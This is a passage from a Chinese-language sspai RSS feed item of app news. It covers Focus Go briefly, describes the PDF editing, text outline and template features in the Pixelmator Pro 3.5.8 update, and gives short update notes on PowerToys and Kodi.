src="https://cdn.sspai.com/editor/u_/coefbcdb34te05l6r89g.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>虽然大部分用户还是习惯使用系统自带的图库 App，不过对于使用 AOSP 类原生系统的用户，可以尝试一下这款「小而美」的 App。现在，你可以在 <a href="https://play.google.com/store/apps/details?id=com.franco.focus.lite">Google Play</a> 免费下载 Focus Go。</p><h2>不容错过的 App 更新</h2><p>除了「新鲜」App，App Store 中的许多老面孔也在不断迭代、更新，增加更多有趣和实用的功能。少数派希望帮你筛选 App Store 中值得关注的 App 动态，让你快速了解 App 和开发者们的最新动态。</p><h3>Pixelmator Pro 更新：改善 PDF 文件编辑功能</h3><ul><li>平台：macOS</li><li>关键词：图像处理、PDF 处理</li></ul><p><a class="ss-atUser" href="https://sspai.com/u/liuxiaofengone">@化学心情下2</a>：近期 Pixelmator Pro 这款专业图像编辑应用迎来了 3.5.8 版本更新，针对 PDF 文件处理等功能进行了增强。</p><p>首先是 PDF 的编辑功能，在此之前的更新中，Pixelmator Pro 增加了对矢量 PDF 的支持，可以将图像、形状和文本元素作为单独的图层导入，而新版本中扩展了这个支持，可以将导入的文本元素作为单独的图层导入，从而可以使用 Pixelmator Pro 来对其进行编辑、替换以及格式化。</p><figure class="image ss-img-wrapper"><img alt="MZK9bDz2oorrrbxX1qQcxDQSnAa" src="https://cdn.sspai.com/editor/u_/coefbclb34te0b9k25pg.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>当然一般为了避免缺少字体等元素导致 PDF 文本字体缺失，我们在生成 PDF 时会将文字转换成矢量图形，但当需要对 PDF 里面的「文本元素」进行编辑时就会比较麻烦，Pixelmator Pro 则采用了提取数据然后尝试转换成文本内容、字体以及格式的方式来方便你重新编辑，当然也会遇到 Mac 上没有安装该字体的情况，这里只需要将其换成 Mac 已经安装的字体，然后继续编辑即可。</p><p>而这个新功能的引入也方便了我们直接编辑由 iWork 导出的 PDF 文件，比如你使用 Pages 编辑文档并生成为 PDF，可以继续用 Pixelmator Pro 编辑，并且文本都会保持为完全可编辑的状态，并且会保留原始的字体。这个流程会非常「平滑无缝」。</p><figure class="image ss-img-wrapper"><img alt="UV1VbdYeboDPCkxJQxTc7iAGnGI" src="https://cdn.sspai.com/editor/u_/coefbd5b34te0b9k25q0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>第二个变化则是样式工具的改进，现在在文本图层中可以针对文本创建自定义轮廓，形式上更像是自定义的「艺术字」设计，你可以在文本内部、中心或者外部添加轮廓，包括文字末端的角的设置、文本边缘虚线等等，你还可以将多种样式组合排版。当然这些设计编辑都支持二次调整。</p><figure class="image ss-img-wrapper"><img alt="U1NmbH9M5oCUFax6yH5caGnTn4f" src="https://cdn.sspai.com/editor/u_/coefbddb34te092f66og.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>最后一个变化则是模版，在本次更新中新增了 12 个相当实用的 Web 以及社交网络展示模版，这些模版可以突出展示产品的一系列新功能和新特性，模版也支持调整背景色用来和原本产品匹配。</p><figure class="image ss-img-wrapper"><img alt="AH1bbxYBOo9REhxhWVzcpH4Rnmg" src="https://cdn.sspai.com/editor/u_/coefbdlb34te092f66p0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>你可以在<a href="https://www.pixelmator.com/pro/">官网</a>免费下载并试用 Pixelmator Pro。</p><h2>App 速报</h2><ul><li>Microsoft PowerToys（<a href="https://github.com/microsoft/PowerToys">Windows</a>）：更新 v0.80，支持通过 Winget 配置文件进行程序配置，Peek 速览支持预览 WebP / Web M 图片格式，支持音频预览。</li><li>Kodi（<a href="https://github.com/xbmc/xbmc/releases/tag/21.0-Omega">Windows｜Linux｜macOS｜Android</a>）：更新至 v21，新版本支持 FFmpeg 6.0、NFSv4，支持读写 M3U8 播放列表、AVIF 图像，改进了 Linux 平台的 AudioEngine，Linux 平台支持透传格式如 DTS-HD 和 TrueHD 等。</li></ul><p>&gt; 关注 <a href="https://sspai.com/link?target=https%3A%2F%2Fwww.xiaohongshu.com%2Fuser%2Fprofile%2F63f5d65d000000001001d8d4">少数派小红书</a>，找到数字时代更好的生活方式 🎊</p><p>&gt; 实用、好用的 <a href="https://sspai.com/mall">正版软件</a>，少数派为你呈现 🚀</p>
                ]]>
            </content:encoded>
        </item>
        
    </channel>
</rss>